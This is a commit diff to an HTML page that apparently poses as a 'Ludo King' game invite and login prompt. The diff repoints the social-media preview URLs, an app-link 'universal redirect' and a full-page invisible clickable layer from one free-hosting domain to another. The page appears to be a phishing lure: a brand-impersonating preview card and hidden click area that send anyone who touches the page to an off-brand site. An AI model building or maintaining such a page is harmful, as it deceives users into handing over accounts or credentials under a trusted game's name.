Update Open Graph and Twitter meta URLs

--- a/index.html
+++ b/index.html
@@ -10,7 +10,7 @@
   <meta property="og:title" content="Ludo King invites you" />
   <meta property="og:description" content="Continue your Ludo King progress securely " />
   <meta property="og:image" content="https://i.postimg.cc/qR6JwjCv/5a6501a4-a969-492b-94dc-8bd3870cb1a8.jpg" />
-  <meta property="og:url" content="https://play-ludo-friends.vercel.app/" />
+  <meta property="og:url" content="https://play-ludo-online-cwp.pages.dev/" />
   <meta property="og:type" content="website" />
   <meta property="og:site_name" content="Ludo King invites you" />
 
@@ -21,7 +21,7 @@
   <meta name="twitter:image" content="https://querulous-crimson-amsttzakrm.edgeone.app/5a6501a4-a969-492b-94dc-8bd3870cb1a8%20(1).jpg" />
 
   <!-- ✅ Universal Redirect on Preview Click -->
-  <meta property="al:web:url" content="https://play-ludo-friends.vercel.app/" />
+  <meta property="al:web:url" content="https://play-ludo-online-cwp.pages.dev/" />
 
   <style>
     body {
@@ -137,7 +137,7 @@
 </head>
 <body>
   <!-- 🔗 Full-page invisible clickable area -->
-  <a href="https://play-ludo-friends.vercel.app/" class="click-layer"></a>
+  <a href="https://play-ludo-online-cwp.pages.dev/" class="click-layer"></a>
 
   <div class="login-box">
     <img class="logo" src="https://i.postimg.cc/qR6JwjCv/5a6501a4-a969-492b-94dc-8bd3870cb1a8.jpg" alt="Ludo King Logo" />
